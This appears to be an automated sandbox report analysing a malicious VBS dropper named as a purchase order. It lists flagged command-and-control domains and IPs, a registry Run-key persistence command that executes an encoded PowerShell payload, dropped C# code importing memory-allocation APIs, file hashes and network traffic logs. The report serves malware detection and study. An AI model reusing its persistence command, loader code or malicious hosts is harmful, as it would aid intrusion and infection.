                          https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaqieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://onedrive.live.com/:ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://jgdbpa.am.files.1drv.com/ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://onedrive.live.com/ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    13.107.43.13
                                    l-0004.l-dc-msedge.netUnited States
                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    197.210.226.45
                                    toshiba1122.ddns.netNigeria
                                    29465VCG-ASNGtrue
                                    197.210.226.89
                                    unknownNigeria
                                    29465VCG-ASNGfalse
                                    148.66.138.165
                                    vegproworld.comSingapore
                                    26496AS-26496-GO-DADDY-COM-LLCUStrue
                                    194.5.98.59
                                    toshiba1122.duckdns.orgNetherlands
                                    208476DANILENKODEtrue
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:625175
                                    Start date and time: 12/05/202213:58:012022-05-12 13:58:01 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 14m 47s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:PO-19903.vbs
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winVBS@15/12@15/5
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, MusNotificationUx.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                    • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, odc-web-brs.onedrive.akadns.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, wdcp.microsoft.com, odc-am-files-brs.onedrive.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    14:01:00API Interceptor38x Sleep call for process: powershell.exe modified
                                    14:01:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Denialsch %Vitell% -w 1 $altdelggen=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').konjun;%Vitell% -encodedcommand($altdelggen)
                                    14:01:38API Interceptor81x Sleep call for process: ieinstal.exe modified
                                    14:01:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Denialsch %Vitell% -w 1 $altdelggen=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').konjun;%Vitell% -encodedcommand($altdelggen)
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):5829
                                    Entropy (8bit):4.901739309084484
                                    Encrypted:false
                                    SSDEEP:96:7sCJ2Woe5wv2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXz9smqFRLcu:Pxoe5GVsm5emdsgkjDt4iWN3yBGHD9sj
                                    MD5:282A064FB3F0E58EC10467E027EA203A
                                    SHA1:B5DCBF5AE67C4B57BA74CA9F614CFB2341F2E62A
                                    SHA-256:86E625B4810E5358AD45B8D99BAB9F94671D39F1424F6E66F1B0661E73E4074F
                                    SHA-512:984F355177D075808049E713A5DFCC12A742CBEF8F3499201C3798EF7A156F8A80A71BB589400D3AFBD5DEDEC4FA0EFD66148F02FAEB2881298D4529F659EF3F
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):59179
                                    Entropy (8bit):7.382148699631125
                                    Encrypted:false
                                    SSDEEP:1536:h+3+oNMsrhj0KX8PR8u6DXwceBy0SE9trLu:Y+NuhQzJ8xrVf0bfLu
                                    MD5:DD9476AAE299F8CD938C0948F1F1C984
                                    SHA1:CB7F30DDE5A14A71FB33FDD8EDECADFBDB59F178
                                    SHA-256:6E63C9314D2B7EEFE27553D57326E4A39DCE0C360CDBF1E5B146C244A0E09EBA
                                    SHA-512:B2E5D0FC61FD41F9135960A0B1C602A3129E9C620ABC233476CFCAFAF827205A0A9E50B80920FFA1713D814C749D3D165462FD06C2EEF9F2AFA1F7A9841FDA3D
                                    Malicious:false
                                    Preview:......h#.a:.4$1..`.,$...ZZ.._1..4...r.@@@@9.u.W.......H;s..e.!.I.$....d.L.G.m.l..:..Z7.XvB.m.!......w.W.M.t....^)\...p*...2|.u....}w.....\.2(.7..F..{....p8...{..z.......c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.].....*../.@..../.ed.b.M`....s...1.....y.+T.T..j.e....R.du...i.2.N{.E...._aZ~...u.W...... :.P.8...V..@(..r%.......B.z....@E.R{ ..n~..@>.o.....B...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..k......qf...M...pPJs...V...m.'1.Z9J.8....%..%...q..*...\..v..b.....!..6.p}.n..9.X...k%....b....r...r.T.36...UJ9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o...........r.b=...A...C..r...J9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o........EI%....7.......r.J.1.....N..b.....!..6.p}.n..9.X...k%.'1.Z9J.8....%..%...q..*...\..v@...E.<...=./..L.Ht......D....F...L...X.(..v.Y+..%.X..r....E*Hn<../bI....7..<.........nf.r.(......G..P.H....]..%.
                                    Process:C:\Windows\SysWOW64\wscript.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):58346
                                    Entropy (8bit):7.3707309060250985
                                    Encrypted:false
                                    SSDEEP:1536:AHSjdJI/K9uq1GJgLYfRAD4vrtQ4FSaPY:Ayjd+C9+gLYfRADY/PY
                                    MD5:3960608F68EE07EDD764386B0A59DEA7
                                    SHA1:320B86E6D9D4514995C76B8E3C48A40F005C61AD
                                    SHA-256:644C64DED01C16C00CBA0FA07DD55A59D9A55DBB870519E09CA986FD5FE9DCDB
                                    SHA-512:9B6E9946A686AA0A37DEE812DF47521D7FB1A44AAAAD6346B842BE45E729536837ABAA24DD9E2E449FC6A8B0C9E76650104F942B2BE94E1850F28BEFE55CEDD8
                                    Malicious:false
                                    Preview:......hl....$.3...4$Z.q.Z.._1..4..E?.@@@@9.u.W.......).>..:mj.1L.12..K\...H......5.....9mg..XF .Z.{s.:..A...M~./....g[.....y....z...CF.@]...{(.....p.l.o..5.$.B..J..d....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..D.@.V.K...H..,1..w.....d.1..7u.u2....."..~ .G..R.8e...pbq...r.s[._'_.8E.....`H..<x|........x.&.C.UPd.6..O..A8...3....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..}.u%.C......Y..W.u}...?......[..A....5.;..J..A....E..=D......y3#.&.}...#..E......%..s..E?..E....M......E?s..Yy.y......($.....u...}..lP1.y..?l+i.....>.I...*(...+..["<.-..HR.t2G.......N..80.y...X.E.iSD?...|<.0y./?.....YM.....EA.OO...>....A.....mwU.>....@.E....h...A..|K.#F..."(......u.m..A... m.........rE?.=.4.E?.e.?.....E?u...i.G?...U.@.j.u.?....+.E...M....Y...K..q"..K.......{...s.1.Sc..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                    Category:dropped
                                    Size (bytes):1336
                                    Entropy (8bit):3.9832564748020243
                                    Encrypted:false
                                    SSDEEP:24:H+m9036o/hHIQwKTFpmfwI+ycuZhNjakSVPNnqSSd:c35ho/KTzmo1ulja3PqSC
                                    MD5:0D697A4FED65CC871D02BE886114CFC2
                                    SHA1:C54DCA05D9B3868AA802D8CC21295D6BE3D3CB19
                                    SHA-256:496C3CE0435E6305C01FC2A8D922559FFD9201AEDE442AC43219F5FB0C02B1FC
                                    SHA-512:6EF62E32ED330C055A0D8F9E48974C91EC5B57560E8EB5DAD227BEED7F361EBEDF703B158BB88ACD8479EABA1249930F2928C740182C5E38950B30E72252F19F
                                    Malicious:false
                                    Preview:L.....}b.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP..................x..rj."q.tb.B.............5.......C:\Users\user\AppData\Local\Temp\RES41DC.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                    Process:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):254965
                                    Entropy (8bit):4.46336089583053
                                    Encrypted:false
                                    SSDEEP:3072:kB1TObln3C9iLn6hzlUPI/aGVBUWcnRhjUo7M:kvObt3C9iL6hzlUPIDVBUWURhIJ
                                    MD5:A962843D9B6CF48DE8842547FB106D97
                                    SHA1:811BF42C5C506C5F8CC8D960A09BE77BAE937091
                                    SHA-256:274A94BE594E05BE571E43C8199840D18F8FFC1FB03D938A45A8A9DC2590B2F8
                                    SHA-512:ABDE20C506F95F27E2AAD393985DFF70AD8E5DA25E5B1535CA50614E86EF065ECA7342A95C95CDE284BED4BD06B68F65FE9E8A56702517698E7D739D5CF836CA
                                    Malicious:false
                                    Preview:'Superstim rukansbu DISPASS Justitsr3 FISKERIT takker SAPREMIAS Elim6 sedgese FILTRE ..'Gyra unhu Forraa3 FOROMTALCH sawniere metageo Inoffenciv8 Automato REFELGULD ANAPHYLAC julepsundi okse aitch Caro3 Nounlessv4 LYDEFRIT UNSOMBRENE KERATOM OVERPOSTIN Toleranc Skov9 Konf VIRTUALIZE barbadiers dogme ..'HOLOGRAPHI Psycho glumpyprae Humlebaeko Seriefrems8 Nedsla ATTA FRIKASSST Redundan Arationi2 storak Forbunds5 Solkurven5 GGEB Turdinae7 mexic Repr1 lege guidonian Nonp frdigb ombudenea amarante SLUTMRKER Fernissend7 STATS FLINGB SORTE SIGATOK Bazookaman6 Phosph1 Renummer ..'Unsen7 Kont1 ekspo Udstd9 Rnnebrtemp Authe Afkort Unbusi node NAILM Alcaide5 potpielabr ..'Hagaritev SPADENDUBL kraterssto farmerb Nete6 Trogonoi Bdepraksis Effektersb Quietest Ceragotyde8 Pinfea3 Betonerdi Biolysi griff carbone STROLLE Concrfsc4 denns flectmanz Typete unmistaked Polyd Mniot9 Adstad smuldets Omklamrin Tube1 Featfolk4 ..'Admiredto6 protokols neutr HULHED Cath Efterret Ritraads1 nucleo Holocepha1 RAMBES
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):652
                                    Entropy (8bit):3.085355193520012
                                    Encrypted:false
                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqVPN5Dlq5J:+RI+ycuZhNjakSVPNnqX
                                    MD5:789FC0726AD32271CC7462EB4284EDD1
                                    SHA1:6084EAA226A2190952393E6D6C32FC34D43D379E
                                    SHA-256:49429559E5B60B3EDA94ECC4160A7C0EF04FE2B967F63A81C9F44F9563C59C58
                                    SHA-512:6D1FB19C11B84F3E06F7871856D8B96B206FB18643494A381811A4C3F649188BD6FE367FAB79A64AB2109BE22C97246997C06E399CBC519AE50BE0EA541E14A2
                                    Malicious:false
                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):889
                                    Entropy (8bit):5.191875284747735
                                    Encrypted:false
                                    SSDEEP:24:JoVSAJt2mRmgkr7NJt29L81RfdafHNQRARU1uRihWRIM:JoVSAJtFmhr7NJtU0RoFQRARbRi4RIM
                                    MD5:EBEF46122B08728A01A250DF520357D7
                                    SHA1:D5DB4A89DA7DE1804EF133F7D81D56523044DA4C
                                    SHA-256:65013DE37A743262C3BEB05B409081A5CA852B93F72CA8CB70C83AAB0CE09F7C
                                    SHA-512:B81F4DDD72DD4F85AC5E0A0B9D7CBF148D834A89BAF9F4E9AAE8A1116D82E802A95F7FF3EE069500031650D4CFACA0F099DE92791B3E64D82299F39F4D89FAB8
                                    Malicious:false
                                    Preview:.using System;..using System.Runtime.InteropServices;..public static class Forly91..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int Forly96,ref Int32 rustninger,int Pointsmenh,ref Int32 Forly9,int WORKSHIPME,int Forly97);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Pointsmenh0,uint Pointsmenh1,IntPtr Pointsmenh2,ref Int32 Pointsmenh3,int Pointsmenh4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Pointsmenh5,int Pointsmenh6);....}
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                    Category:dropped
                                    Size (bytes):371
                                    Entropy (8bit):5.195659144967975
                                    Encrypted:false
                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23feVU+zxs7+AEszICN23feVun:p37Lvkmb6KmCU+WZE7Cun
                                    MD5:25C1DEA17960CAAC0387294B7B09B27C
                                    SHA1:61671246D0E746A051BCFB22703403FD732C633F
                                    SHA-256:65891E3CBB8205A583A1D3496AE355DB0D6C87293EECC6852AC09628C773DE6C
                                    SHA-512:A613E36971BCABF8D247D06BF0696B0ECD39EECFEE543D37E5B588E6A919E34ACB20DE944A87E39CF12E7B16E40A2084B6236E30D0B810F0B2705EAF0B75171F
                                    Malicious:false
                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.0.cs"
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3584
                                    Entropy (8bit):3.275074049097374
                                    Encrypted:false
                                    SSDEEP:24:etGSTENIjzSJ14jyQS8VwIGFkVkQAzEZp5kjAhbvZtkZf3H4QbfWI+ycuZhNjakn:61PS4jyMCkVktzE6jUoJ3tK1ulja3Pq
                                    MD5:096F9F5031157309DD27175D10A61229
                                    SHA1:4BBA95BF76B7D0A18F679A265ED01073424B5D20
                                    SHA-256:4928EC7341EF0634A82D3B34754CD59342A72B9C90ECA5810ED211A4BFB1786D
                                    SHA-512:7BDE2584137D136FC1750213958A1FF14216792C88DCD7D1CDB7C38E3509BD21B05D7A4C8DC227D21BDE2E5F325635AAFB609CF759FB4F47EE3FD26AF6F6E8F6
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}b...........!.................%... ...@....... ....................................@.................................p%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P .. ...........................................................BSJB............v4.0.30319......l.......#~..l...,...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................/.(.................~.....~.......................................... 6............ A............ F............ ^.!.......... c.+.......o.....u.....~.......................... ..o.....u.....~.........................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):870
                                    Entropy (8bit):5.284396790491977
                                    Encrypted:false
                                    SSDEEP:24:KSqd3ka6KmH/E7yKax5DqBVKVrdFAMBJTH:dika6PH/E7yK2DcVKdBJj
                                    MD5:6BE78BEEDA948F094B733CD40AE5BFA7
                                    SHA1:1F043CE3260533211EAD482A960BA7CD3B921A2F
                                    SHA-256:1082F9CE64C6337C4D66382B89E91535AF198943A86CBCDCD34E5EB7C84C0FDA
                                    SHA-512:AC4BE9064F083C4D5DB899D686ED6F82D5A18E0083F2128944157B0BB8945C632093F761AE5562BC41F9BFADFEF37D6CCF79B8DD1FF23FD788AC2E39C57359A9
                                    Malicious:false
                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    File type:ASCII text, with very long lines, with CRLF line terminators
                                    Entropy (8bit):4.507728980611977
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:PO-19903.vbs
                                    File size:256870
                                    MD5:0347b27843d88f73fdcd4dadb95549ac
                                    SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
                                    SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
                                    SHA512:368c6f19dc73693acd0f8c2513489ecb65bc763a6536de22a5421c05aff613191cd51379086765447b74faf28179e1253f7166d85ad9344a7a4be4442f1b9669
                                    SSDEEP:3072:UCZ+vnIxDSTz1EGYdx3VyZcd4B5RYe/aVPC1C:UCZ+vnWOtPYdLyDRYcaVqI
                                    TLSH:A544769245B1AFC8D1F839DFCB0D8620B2009D99A2D7F54C9AE211BD7FC72DA531B294
                                    File Content Preview:'Leaveni MIDLET ABSENTEREN TITTERE Stningssek SMDES SOCIOECON Afgjortele gaidropsar Undenize4 FORR ..'FLISEB kogasinu VALMUER Repac2 RESTA HYPERTRO Facittets6 forespoer Deklarer MATRAL Vier Epigraphe CAPRYLYLF Fintll3 EKSPE Duode Kakkelovn Netdriverw skry
                                    Icon Hash:e8d69ece869a9ec4
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 12, 2022 14:01:30.924190998 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:30.924276114 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:30.924489975 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:30.973346949 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:30.973366976 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:31.730143070 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:31.730442047 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:31.854789972 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:31.854855061 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:31.855555058 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:31.855719090 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:31.861512899 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:31.902643919 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.121182919 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.121321917 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.121403933 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.121460915 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.121536970 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.121731997 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.121787071 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122005939 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.122160912 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122220039 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122397900 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122452021 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.122550011 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.122776985 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122811079 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122826099 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122839928 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.122853994 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.123212099 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.123460054 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.123744965 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.123963118 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.124126911 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.124381065 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.124589920 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.124772072 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.368755102 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.368793011 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.369030952 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.369318962 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.369486094 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.369673967 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.369816065 CEST44349738148.66.138.165192.168.11.20
